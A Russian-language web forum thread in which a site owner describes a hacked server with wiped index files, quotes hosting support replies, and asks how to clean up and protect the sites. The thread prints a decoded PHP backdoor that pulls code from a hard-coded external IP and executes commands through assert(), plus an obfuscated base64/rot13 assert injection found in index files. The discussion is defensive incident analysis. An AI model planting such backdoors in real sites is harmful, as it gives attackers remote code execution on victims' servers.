Z_Design

А это к нему не относится? в опен карте какая хурма

Какой антивирь порекомендуете для сервера? я использую щас только manul от яндекса для проверки

по факту с базы он стирает информацию? там следы оставляет? или достаточно удалить схожий код по сайту?

Вот такой код получится, если расшифровать: <?phpif (isset($ibv)){ echo $ibv;}else{ if (!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]); if (!isset($c_["HTTP_ACCEPT_CHARSET"])) { if (preg_match("!.!u", file_get_contents($_SERVER["SCRIPT_FILENAME"]))) { $c0 = "UTF-8"; } else { $c0 = "windows-1251"; } } else { $c0 = $c_["HTTP_ACCEPT_CHARSET"]; } if (function_exists("curl_init")) { $c1 = curl_init("http://109.236.81.101/get.php?d=" . urlencode($_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]) . "&u=" . urlencode($_SERVER["HTTP_USER_AGENT"]) . "&c=" . $c0 . "&i=1&ip=" . $_SERVER["REMOTE_ADDR"] . "&h=" . md5("5901ac288e42519524e863ffc803aa04" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] . $_SERVER["HTTP_USER_AGENT"] . $c0 . "1")); curl_setopt($c1, 42, false); curl_setopt($c1, 19913, true); $ibv = curl_exec($c1); curl_close($c1); } elseif (ini_get("allow_url_fopen") == 1) { $ibv = file_get_contents("http://109.236.81.101/get.php?d=" . urlencode($_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]) . "&u=" . urlencode($_SERVER["HTTP_USER_AGENT"]) . "&c=" . $c0 . "&i=1&ip=" . $_SERVER["REMOTE_ADDR"] . "&h=" . md5("5901ac288e42519524e863ffc803aa04" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] . $_SERVER["HTTP_USER_AGENT"] . $c0 . "1")); } if (isset($ibv)) { echo $ibv; } if (isset($_REQUEST["p"]) && $_REQUEST["p"] == "8bfdcec8") { @assert($_REQUEST["c"]); }}assert, если что, выполняет код, переданный ему как аргумент. Этот код скачивает другой код с какого-то сервера и выполняет его. Код получается с этого адреса (адрес зависит от многих факторов): http://109.236.81.101/get.php?d=%2Fparser%2Ftemp%2F[...]&u=Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.36&c=UTF-8&i=1&ip=[...]&h=0240065be4f4bb968b324c70a15ee7eaIP, судя по всему, принадлежит этому хостингу. с помощью чего расшифровал?

а дело в том что есть и самописные сайты без движков, там полетели index.html В общем спасибо. придется парится..... а так и joomla и wordpress и opencart везде где лежит файт index даже на глубине где то и то изгажен

Как можно защитить то index ы то? т.к. щас все подчищу и вдруг снова налетит. не подскажите?

Спасибо. Т.е. по сути скорее всего работа чувака с хер пойми откуда? вряд ли бы русский регался там. тем более с города армавира то) были подозрения на конкуренцию)))

Тех поддержка просто капец. Цитирую: Здравствуйте. На указанных вами сайтах index.php имеет нулевой размер, вероятнее всего, их взломали. В данном случае могу предложить вам только восстановление из резервной копии, если они у вас на сервере делаются. Вижу, предыдущая была неделю назад. В логах панели нет информации по взлому. Похоже, взломаны именно скрипты. > Как от этого защитится? Своевременно обновлять CMS и размещать сайты под разными пользователями. > уверены? В том, что индексные страницы пусты? Абсолютно. facturafest, вижу, уже восстановили. У royal-hunt в резервных копиях нет index.php, однако он работает с index.html. Выставил в настройках сайта через панель ISPmanager. К слову, facturafest также отсутствует в резервной копии. Я бы рекомендовал вам запустить задачу резервного копирования и убедиться, что нет ошибок. > Может быть такое что это с помощью sql запроса почистили? Крайне маловероятно. Только если с помощью SQLi пароль к админке нашли. вы говорили cms а на царской охоте и движка то нет. Здравствуйте, пароль из письма об открытии к серверу не подкходит, предоставьте root пароль для доступа к серверу. Пароль не надо, ошибся. Здравствуйте, во многих файлах сайта есть вредоносные вставки, лучше произвести восстановление всех файлов сайтов из бекапа. Вот такая тема в index стала: <?php//###=i=###error_reporting(0); $strings = "as";$strings .= "sert"; @$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUgcMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFyxnJHbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXGgcMvtunKAmMKDbWTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy0cXKgcMvujpzIaK21uqTAbXPVuYvS1VvkznJkyK2qyqS9wo250MJ50pltxK1ASHyMSHyfvH0AFFIOHK0MWGRIBDH1SVy0cXFy7WTZjCFWIIRLgBPV7sJIfp2I7WTZjCFW3nJ5xo3qmYGRlAGRvB319MJkmMKfxLmN9WTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy07sJyzXTM1ozA0nJ9hK2I4nKA0pltvL3IloS9cozy0VvxcrlEwZG1wqKWfK2yhnKDbVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9aMKDhpTujC2D9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVzLm0vYvEwZP4vWzx9ZFMcpQ0vYvEsH0IFIxIFJlWFEH1CIRIsDHERHvWqYvVznQ0vYz1xAFtvAGxjZJSwZwt4MGDlAGR5AGV0MGt2Z2MzLmtjZ2SuZQDvYvEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqYvEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKF4xLmNhVwRvXFx7L3IloS9mMKEipUDbWTZkYQDlYTMuoUAyXGgwqKWfK3AyqT9jqPtxLmRfZGx5ZGZfqUW1MFx7WTyvqvN9VPOwqKWfK2I4MJZbWTZkXGgwqKWfK2Afo3AyXPEwZFx7sJIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXG09ZFy7WTyvqvN9VTMcoTIsM2I0K2AioaEyoaEmXPWbqUEjBv8iZGN5YwVmAv44ZF4kZQRiM2I0YaObpQ9xCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzZ9Vv4xLmNhVvMcCGRznKN9Vv4xK1ASHyMSHyfvHxIAG1ESK0SRESVvKF4vWzt9Vv5gMQHbVwH5ZQSuLmV4BTH0ZwHkBGHlATH4AwAzMzZ4ZQAuLGN0Vv4xK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKF4xK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0hWTZjYvVkVvxcB30tnJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOcMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwuvMzEwMJZ4VvxtrlONLKAmMKW0XPEsHxIEIHIGISfvLlWqXGftsK0="));'));//###=i=###

Добрый вечер. В общем как то взломали мой хост и постирали все index.php и index.html Как это возможно? и как бороться?